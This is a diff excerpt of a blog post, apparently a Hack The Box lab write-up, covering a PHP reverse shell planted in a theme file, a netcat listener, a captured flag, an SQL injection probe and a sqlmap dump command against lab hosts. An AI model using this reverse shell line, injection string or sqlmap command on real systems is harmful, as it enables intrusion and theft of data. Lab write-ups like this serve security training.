kchen4028/kchen4028.github.io/_posts/2025-03-14-AEN-Module.md

 exec("/bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1'");
 ?>

 and then inserting it into one of the themes php files.
 We then start our netcat listener and activate the theme to receive the bash shell.
-After using a find command, we find the 5th flag in the /var/www/html directory: ==HTB{e7134abea7438e937b87608eab0d979c}==
+After using a find command, we find the 5th flag in the /var/www/html directory: HTB{e7134abea7438e937b87608eab0d979c}

+### Sixth Flag:

 Next we move onto status.inlanefreight.local.
 I see that there is a text box on the website so I attempted a sql injection with ' OR 1=1 --.
 It did not seem to work but it did throw a SQL error message on BurpSuite repeater.
 I saved the HTTP request as a file and then input it into sqlmap with the command "sqlmap -r sqlmap1 --batch --dump --level 5 --risk 3" with sqlmap1 as the HTTP request file.